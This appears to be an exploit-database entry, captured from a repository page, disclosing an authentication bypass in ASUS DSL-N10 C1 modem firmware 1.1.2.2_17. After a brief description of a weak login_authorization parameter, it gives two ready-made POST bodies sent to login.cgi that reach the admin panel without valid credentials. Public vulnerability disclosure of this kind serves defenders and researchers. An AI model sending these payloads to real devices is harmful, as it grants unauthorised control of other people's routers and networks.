2e282df4a8
3 changes to exploits/shellcodes JioFi 4G M2S 1.0.2 - Denial of Service (PoC) ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
21 lines
No EOL
987 B
Text
21 lines
No EOL
987 B
Text
# Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
|
|
# Author: AmnBAN team
|
|
# Date: 2018-08-06
|
|
# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
|
|
# Sofrware version: 1.1.2.2_17
|
|
# CVE: N/A
|
|
|
|
# 1. Description:
|
|
# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization
|
|
# parameter in post data, that use for authorization access to admin panel,
|
|
# the data of this parameter is not fully random and you can use old data
|
|
# or data of another device to access admin panel.
|
|
|
|
# 2. Proof of Concept:
|
|
# Browse http://<Your Modem IP>/login.cgi
|
|
|
|
# Send this post data:
|
|
group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
|
|
|
|
# Or this post data:
|
|
group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D |